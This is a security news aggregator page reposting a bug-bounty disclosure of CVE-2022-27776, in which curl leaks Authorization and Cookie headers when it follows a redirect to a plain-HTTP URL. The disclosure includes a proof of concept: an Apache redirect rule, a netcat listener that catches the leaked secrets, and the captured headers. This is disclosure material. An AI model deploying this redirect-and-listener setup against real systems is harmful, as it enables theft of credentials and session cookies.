Cookie Consent by Free Privacy Policy Generator ๐Ÿ“Œ Internet Bug Bounty: CVE-2022-27776: Auth/cookie leak on redirect

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š Internet Bug Bounty: CVE-2022-27776: Auth/cookie leak on redirect


๐Ÿ’ก Newskategorie: Sicherheitslรผcken
๐Ÿ”— Quelle: vulners.com


image
Summary: curl/libcurl can be coaxed to leak Authorization / Cookie headers by redirecting request to http:// URL on the same host. Successful exploitation requires that the attacker can either Man-in-the-Middle the connection or can access the traffic at the recipient side (for example by redirecting to a non-privileged port such as 9999 on the same host). Steps To Reproduce: Configure for example Apache2 to perform redirect with mod_rewrite: RewriteCond %{HTTP_USER_AGENT} "^curl/" RewriteRule ^/redirectpoc http://hostname.tld:9999 [R=301,L] ... the attacker could also use .htpasswd file to do so. Set up netcat to listen for the incoming secrets: while true; do echo -ne 'HTTP/1.1 404 nope\r\nContent-Length: 0\r\n\r\n' | nc -v -l -p 9999; done curl-L -H "Authorization: secrettoken" -H "Cookie: secretcookie" https://hostname.tld/redirectpoc The redirect will be followed, and the confidential headers sent over insecure HTTP to the specified port: GET / HTTP/1.1 Host: hostname.tld:9999 User-Agent: curl/7.83.0-DEV Accept: */* Authorization: secrettoken Cookie: secretcookie The attack could also use HTTPS and a valid certificate, In this case the leaked headers are of course only be visible to the listening http server. This vulnerability is quite similar to CVE-2022-27774 and the fix is similar too: If the protocol or port number differs from the original request strip the Authorization and Cookie headers. This bug appears to be at: -... ...



๐Ÿ“Œ Internet Bug Bounty: Cookie headers are not cleared in cross-domain redirect in undici-fetch


๐Ÿ“ˆ 38.23 Punkte

๐Ÿ“Œ Internet Bug Bounty: [CVE-2023-38546] cookie injection with none file


๐Ÿ“ˆ 29.74 Punkte

๐Ÿ“Œ Internet Bug Bounty: Security Unfavorable Specifications and Implementations in the CGI::Cookie Class


๐Ÿ“ˆ 28.57 Punkte

๐Ÿ“Œ Internet Bug Bounty: curl cookie mixed case PSL bypass


๐Ÿ“ˆ 28.57 Punkte

๐Ÿ“Œ Internet Bug Bounty: Open Redirect Vulnerability in Action Pack


๐Ÿ“ˆ 28.17 Punkte

๐Ÿ“Œ Internet Bug Bounty: Proxy-Authorization header is not cleared in cross-domain redirect in undici


๐Ÿ“ˆ 28.17 Punkte

๐Ÿ“Œ [Bug Bounty Hacker] Yahoo Bug Bounty Program 2016 - Sender Spoofing Vulnerability


๐Ÿ“ˆ 27.74 Punkte

๐Ÿ“Œ Ebay Inc Bug Bounty Magento Commerce Bug Bounty - Persistent Cross Site Scripting Vulnerability


๐Ÿ“ˆ 27.74 Punkte

๐Ÿ“Œ Naked Security Live โ€“ When is a bug bounty not a bug bounty?


๐Ÿ“ˆ 27.74 Punkte

๐Ÿ“Œ Bug Bounty Field Manual: The Definitive Guide for Planning, Launching, and Operating a Successful Bug Bounty Program


๐Ÿ“ˆ 27.74 Punkte

๐Ÿ“Œ Bug Bounty Field Manual: The Definitive Guide for Planning, Launching, and Operating a Successful Bug Bounty Program


๐Ÿ“ˆ 27.74 Punkte

๐Ÿ“Œ Fear and hacking on the bug bounty trail: write up of Atlassian's first (Bugcrowd) Bug Bounty event in Sydney


๐Ÿ“ˆ 27.74 Punkte

๐Ÿ“Œ Bug Bounty Platforms [Best Choices For a Bug Bounty Program]


๐Ÿ“ˆ 27.74 Punkte

๐Ÿ“Œ Bug Bounty Benefits | Why You Need a Bug Bounty Program


๐Ÿ“ˆ 27.74 Punkte

๐Ÿ“Œ Google-Dorks-Bug-Bounty - A List Of Google Dorks For Bug Bounty, Web Application Security, And Pentesting


๐Ÿ“ˆ 27.74 Punkte

๐Ÿ“Œ Heroku Bug Bounty #2 - (API) Re Auth Bypass Vulnerability


๐Ÿ“ˆ 25.55 Punkte

๐Ÿ“Œ Paypal Bug Bounty #102 QRL - Auth Bypass Vulnerability


๐Ÿ“ˆ 25.55 Punkte

๐Ÿ“Œ PayPal Bug Bounty #45 BillSafe - Auth Bypass Vulnerability


๐Ÿ“ˆ 25.55 Punkte

๐Ÿ“Œ Heroku Bug Bounty #2 - (API) Re Auth Bypass Vulnerability


๐Ÿ“ˆ 25.55 Punkte

๐Ÿ“Œ Paypal Bug Bounty #102 QRL - Auth Bypass Vulnerability


๐Ÿ“ˆ 25.55 Punkte

๐Ÿ“Œ PayPal Bug Bounty #45 BillSafe - Auth Bypass Vulnerability


๐Ÿ“ˆ 25.55 Punkte

๐Ÿ“Œ Heroku Bug Bounty #2 - (API) Re Auth Bypass Vulnerability


๐Ÿ“ˆ 25.55 Punkte

๐Ÿ“Œ Paypal Bug Bounty #102 QRL - Auth Bypass Vulnerability


๐Ÿ“ˆ 25.55 Punkte

๐Ÿ“Œ PayPal Bug Bounty #45 BillSafe - Auth Bypass Vulnerability


๐Ÿ“ˆ 25.55 Punkte

๐Ÿ“Œ Heroku Bug Bounty #2 - (API) Re Auth Bypass Vulnerability


๐Ÿ“ˆ 25.55 Punkte

๐Ÿ“Œ Paypal Bug Bounty #102 QRL - Auth Bypass Vulnerability


๐Ÿ“ˆ 25.55 Punkte

๐Ÿ“Œ PayPal Bug Bounty #45 BillSafe - Auth Bypass Vulnerability


๐Ÿ“ˆ 25.55 Punkte

๐Ÿ“Œ Internet Bug Bounty: Leak of sensitive values to Airflow rendered template


๐Ÿ“ˆ 25.08 Punkte

๐Ÿ“Œ Bugtraq: [CVE-2016-6582] Doorkeeper gem does not revoke tokens & uses wrong auth/auth method


๐Ÿ“ˆ 24.54 Punkte

๐Ÿ“Œ Bugtraq: [CVE-2016-6582] Doorkeeper gem does not revoke tokens & uses wrong auth/auth method


๐Ÿ“ˆ 24.54 Punkte

๐Ÿ“Œ Low CVE-2019-16751: Devise token auth project Devise token auth


๐Ÿ“ˆ 24.54 Punkte

๐Ÿ“Œ Medium CVE-2020-14068: Mk-auth Mk-auth


๐Ÿ“ˆ 24.54 Punkte

๐Ÿ“Œ Low CVE-2020-14071: Mk-auth Mk-auth


๐Ÿ“ˆ 24.54 Punkte

๐Ÿ“Œ Medium CVE-2020-14069: Mk-auth Mk-auth


๐Ÿ“ˆ 24.54 Punkte











matomo